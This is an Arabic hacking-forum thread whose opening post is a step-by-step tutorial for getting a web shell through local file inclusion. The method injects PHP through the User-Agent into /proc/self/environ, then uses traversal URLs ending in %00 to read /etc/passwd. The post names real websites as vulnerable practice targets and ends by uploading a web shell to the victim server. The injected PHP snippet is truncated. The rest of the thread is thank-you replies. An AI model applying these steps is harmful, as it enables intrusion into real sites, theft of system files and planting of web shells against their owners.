![]() |
الحصول على شل عن طريق ثغرات local file include المنتشره بكثره السلام عليكم ورحمة الله وبركاته موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر الأدوات الأول 1 - متصفح فير فوكس (أكيد عند كله) 2 - إضافة mozilla sniffer https://addons.mozilla.org/en-US/firefox/addon/176005/ 3 - فتح دماغك معايا شويه بس نبدأ الشرح ده مثال لموقع مصاب بثغرة lfi http://www.iowaarboretum.org/index.p.../etc/passwd%00 وده موقع للتطبيق فى حالتنا http://falalalalights.net/site/index...elf/environ%00 على سبيل المثال لا الحصر نشوف هنعمل ايه أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم) المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت احنا بقى هنعمل ايه هنحقن المجلد ده بشل بسيط الاوا وعن طريق الشل البسيط نرفع شل كبير نشوف ازاى ده المسار اللى بنجيب منه اليوزرات http://www.site.com/index.php?option.../etc/passwd%00 وخلى بالك من علامة %00 اللى فى الاخر دى مهمه جدا طيب بعد منطلب الملف ده النتيجه هتبقى كده [http://img405.imageshack.us/img405/6839/28542091.jpg تمام لحد كده الموقع مصاب وزى الفل نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات ازاى بقى يا حلو هنغير /etc/passwd ب /proc/self/environ http://www.site.com/index.php?option...elf/environ%00 لو كان الناتج زى كده http://img684.imageshack.us/img684/8953/82396384.jpg يبقى متفعله وزى الفل طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه اوك لقيناه متفعل هنعمل ايه نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا كود: <?php نشوف بقى هنحقنه ازاى بعد متسطب الاداه mozilla sniffer تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer وبعدين تضغط start sniff طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol طيب ضغطنا start sniff افتح بقى السايت تانى طبعا السايت ده http://www.site.com/index.php?option...elf/environ%00 واختار tamper تلقى جاك حاجه زى دى http://img717.imageshack.us/img717/5847/54189235.jpg لاحظ المحدد بازرق اللى هو user agent حط مكانه كود الشل الموجود فوق واتكى ok تمام كده تلاقى الصفحه ظهر فيها فورم رفع زى ده http://img3.imageshack.us/img3/6690/66529820.jpg لول ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش بعد متضغط ابلود اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع http://img339.imageshack.us/img339/7194/27963690.jpg واضغط اوك تمام كده انا رفعت الشل باسم faris.php تروح بقى على السايت مباشر وتضيف يعدها اسم الشل توضيح انا كنت شغال هنا http://www.site.com/index.php?option...elf/environ%00 يبقى الشل هنا http://www.site.com/faris.php والنتيجه http://img155.imageshack.us/img155/6245/77049477.jpg مبروووك lol انتهى الشرح اتمنى يكون واضح وأى استفسارات انا جاهز HaCKeR-MaN k: نسخ لصق ------- ahmed_100022 عالم المعرفه |
thank you |
مشكووورين على الشرح الاكثر من رائع بس الثغرات دي صارت نادرة و ان وجدت ما تنفع كثير بسبب اصدار البي آتش بي 5.x بس تزبط بالاصدار 4.x با>ن الله |
[align=center][/align]مشكور اخ volc4no على الشرح الرائع بانتظار جديدك دائما |
والله شرح وافي وكافي بس ما ينفع الا مع قليل |
مشكووووووووووور يعطيك الف عافيه |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره مشكور اخي على المعلومه الحلوه |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره شكرا لك يا غالي |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره شكرا يا عسل |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره thxxxxxxxxxxxxxxxxxxxxxxxxxx |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره a;vhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره thxxxxxxxxxxxxxxxxxxxxxxxxxx |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره شكراا لك حبيبي الغالي !! |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره مشكور اخي فولكانو |
رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره god men pro |
الساعة الآن 01:11 AM |
[ vBspiders.Com Network ]